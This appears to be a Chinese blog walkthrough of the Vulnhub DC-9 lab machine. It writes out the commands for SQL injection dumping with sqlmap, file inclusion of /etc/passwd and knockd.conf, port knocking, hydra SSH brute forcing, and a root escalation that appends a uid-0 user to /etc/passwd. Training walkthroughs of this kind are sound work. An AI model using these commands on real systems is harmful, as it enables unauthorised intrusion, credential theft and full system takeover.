Vulnhub:DC-9靶机

kali:192.168.111.111

靶机:192.168.111.128

信息收集

端口扫描,发现22端口被过滤

nmap -A -v -sV -T5 -p- --script=http-enum 192.168.111.128

Vulnhub:DC-9靶机_第1张图片

目录爆破

Vulnhub:DC-9靶机_第2张图片

漏洞利用

在search.php的搜索框处发现存在sql注入

Vulnhub:DC-9靶机_第3张图片

 

利用sqlmap获取目标数据

sqlmap -o -r ./a.txt --batch --level 5 --risk 3 -D 'users' -T 'UserDetails' -C 'username,password' --dump

Vulnhub:DC-9靶机_第4张图片

 

md5解密后得到密码:transorbital1

sqlmap -o -r ./a.txt --batch --level 5 --risk 3 -D 'Staff' -T 'Users' -C 'Username,Password' --dump

Vulnhub:DC-9靶机_第5张图片

 

登录后在manage.php处发现存在文件包含

Vulnhub:DC-9靶机_第6张图片

 

Vulnhub:DC-9靶机_第7张图片

 

根据之前22端口被过滤,尝试包含/etc/knockd.conf

Vulnhub:DC-9靶机_第8张图片

 

对7469,8475,9842端口进行端口碰撞后22端口开启

knock 192.168.111.128 7469 8475 9842 -v

Vulnhub:DC-9靶机_第9张图片

 

Vulnhub:DC-9靶机_第10张图片

 

利用文件包含/etc/passwd获取的用户和sql注入获取的users数据库中的密码爆破ssh

hydra -L user.txt -P pass.txt 192.168.111.128 -s 22 ssh -t 64

Vulnhub:DC-9靶机_第11张图片

 

提权

在janitor家目录下的发现密码字典

Vulnhub:DC-9靶机_第12张图片

 

利用利用这些密码再次爆破ssh,获得fredf用户密码:B4-Tru3-001

Vulnhub:DC-9靶机_第13张图片

 

用fredf用户登录查看sudo权限

 

/opt/devstuff/dist/test/test程序源码在/opt/devstuff/test.py

Vulnhub:DC-9靶机_第14张图片

 

写一个新用户到/etc/passwd

openssl passwd -1 -salt a a
echo 'a:$1$a$44cUw6Nm5bX0muHWNIwub0:0:0::/root:/bin/bash' > /tmp/user.txt
sudo -u root /opt/devstuff/dist/test/test /tmp/user.txt /etc/passwd

 

Vulnhub:DC-9靶机_第15张图片

 

flag

Vulnhub:DC-9靶机_第16张图片

 

你可能感兴趣的:(安全,web安全,网络安全)